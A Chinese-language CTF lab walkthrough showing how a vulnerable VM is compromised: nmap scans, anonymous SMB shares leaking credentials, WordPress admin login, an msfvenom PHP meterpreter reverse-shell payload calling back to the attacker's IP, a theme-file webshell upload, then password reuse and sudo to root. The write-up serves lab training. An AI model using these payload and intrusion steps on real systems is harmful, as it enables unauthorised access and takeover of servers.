声明:此博客只是记录自己的ctf学习过程,请勿用于非法途径。

靶场机器IP地址:192.168.31.48

挖掘开放的服务信息:

nmap -sV 192.168.31.48

 

 

挖掘靶场全部信息:

nmap -A -v -T4 192.168.31.48

针对SMB协议的分析主要分为两块:

一是使用空口令、弱口令等尝试登陆,并查看敏感文件;

二是针对SMB协议远程溢出漏洞进行分析。

 

对于第一点:

 

 可以发现有可以查看的共享文件。

查看print$文件:

smbclient '\\192.168.31.48\print$'

依旧使用空密码,发现失败:

 

 使用同样的方法,发现可以进入share$文件:

 

 再去看看IPC文件:

 

 发现可疑进入共享文件,但是并没有查看的权限。

所以还是从share$文件入手:

使用get去下载敏感文件:

然后重新打开一个终端,cat一下这个下载下来的文件:

 

 

 

 

 找到一个password:12345

share$里面还有一个wordpress目录,进去看一看有啥文件:

 

 config文件一般要着重关注,下载下来看一看:

 

 发现了一个数据库的用户名和密码

而之前扫描的结果中显示这个靶机开放了mysql服务

尝试在终端直接远程登陆靶机的数据库:

mysql -h 192.168.31.48 -u Admin -p

 

 发现失败了

我们又发现之前扫描服务的时候开放了ssh服务,那么这个用户名和密码能不能远程登陆ssh服务呢

ssh Admin@192.168.31.48

 

 在输入密码的地方输入刚才发现的密码,发现还是失败了。

那么对于SMB协议分析的第一点好像行不通

那么我们来尝试第二点:针对SMB协议远程溢出漏洞进行分析:

serachsploit samba版本号

版本号在之前nmap扫描结果中可以找到:

 

 对于第一个SMB版本号并没有什么发现:

 

 对于第二个版本号也没有什么发现:

 

 这就很尴尬了......

 

之前nmap扫描结果中显示靶机开放了http服务:

对于http服务的弱点分析只要分为三块:

1.浏览器查看网站

2.使用dirb nikto探测

3.寻找突破点,目标登陆后台,上传webshell

直接从第二点开始:

dirb http://192.168.31.48

发现了这么一个登陆的地址:

 

 直接浏览器打开并输入之前的用户名与密码,发现登陆成功!

对于wordpress,一般可以使用固定的方法去上传webshell

制作webshell:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.113 lport=4444 -f raw 

 

 

然后启动监听本地指定端口号是否有反弹回来的tcp连接:

msfconsole

  msf5 > use exploit/multi/handler

  msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

  msf5 exploit(multi/handler) > set lhost 192.168.31.113

  msf5 exploit(multi/handler) > run

 

在浏览器中找到上传点:

 

 将之前生成的webshell覆盖在这儿:

 

 然后下滑,点上传:

 

 然后执行这个webshell,在浏览器中直接访问:

http://192.168.31.48/wordpress/wp-content/themes/twentyfifteen/404.php

这时候看监听端已经反弹回了shell:

 

 这时候已经获得了服务器的普通权限:

 

 接下来就需要获取root权限:

先优化一下终端:

python -c "import pty;pty.spawn('/bin/bash')"

 

查看有哪些用户:

<ww/html/wordpress/wp-content/themes/twentyfifteen$ cat /etc/passwd

找到一个在/home目录下的用户名togie:

 

 直接登陆该用户:

su togie

发现需要密码,还记得之前那个12345密码么,试试看:

 

 登陆成功,看看togie用户可以执行哪些操作:

sudo -l

 

 

 试试看直接提权:

sudo su

 

 

 输入密码后发现成功变成root权限

那直接去根目录看看有啥文件:

 

 本题结。